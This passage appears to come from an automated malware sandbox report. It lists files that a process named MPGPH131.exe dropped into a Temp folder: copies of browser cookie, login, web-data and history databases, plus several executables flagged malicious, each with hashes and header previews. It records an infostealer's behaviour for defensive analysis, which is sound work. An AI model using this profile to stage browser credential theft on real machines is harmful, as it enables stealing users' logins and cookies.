                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\02zdBXl47cvzcookies.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\1tu3JEnOc1WEcDVr1Q0N.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):739328
                                                                                                                                                                                  Entropy (8bit):7.979896185184989
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:IINqBfLfGjui+14ljDuNbRdjc3dEEwq4FDLk2ldHU3nhR1JPHVQPInKIkTMZ+kur:I0Beb/c3d5wqsk2vQnnzKITZlucg
                                                                                                                                                                                  MD5:28EF40F53C38FDF1211F174563BB532C
                                                                                                                                                                                  SHA1:123AABE3254B8BB0EEDBEB03AB5C89F461B120EB
                                                                                                                                                                                  SHA-256:008870E652BE38FC6EC9D8DDE344BB9B70E3409879E02E1E09397D8060D859AE
                                                                                                                                                                                  SHA-512:EF64FA7DE06D5C2242D7B164A49282B34104D05C0828CCF228E598E1886E5A19FEF5D637F480BB58E8CCEB35CF28A26AF008CE7C543E3F4C5EF705C8C68F709D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........\...........@...........................\.....}.$...@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..-.........................@...gakjennq.p...@A..j..................@...brsozmps......\......x$.............@....taggant.0....\.."...|$.............@...................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\2jQJv37iJ0lzCookies

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\3b6N2Xdh3CYwWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\65cFitrzjaGsYAt5EzWY.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\8ghN89CsjOW1Login Data For Account

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\D87fZN3R3jFeWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\D87fZN3R3jFeplaces.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\Ei8DrAmaYu9KLogin Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\IWPfiAXUTJTSHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\KvHrxJ77cmUgLogin Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\QdX9ITDLyCRBWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\UPG2LoPXwc7OWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\ZLGJz1zjooaGjpiGIhT0.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$e.........."...0..$............E.. ...`....@.. ........................F.....}H....`.................................m........`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........6..............@... ..*..........8..............@...odmizeae.....@+......:..............@...wjrksujl. ....E.....................@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\ZunTSaNJLBVfWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\aCN0ucpg7A4ErZQbp9NR.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e.........."..........P......w.............@..........................`............@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\dZPbe9okQutRw6uffMvo.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....`......$............@......................................@... .. .... .. .......... `.......l..x....0..h....................`.......................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@............0...p.......b..............@....................d...b..............@....rsrc....0...0...0..................@..@..........x..`...(..................@....data.....!..0....!.................@...................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\o0qT3dWYBP7ZHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
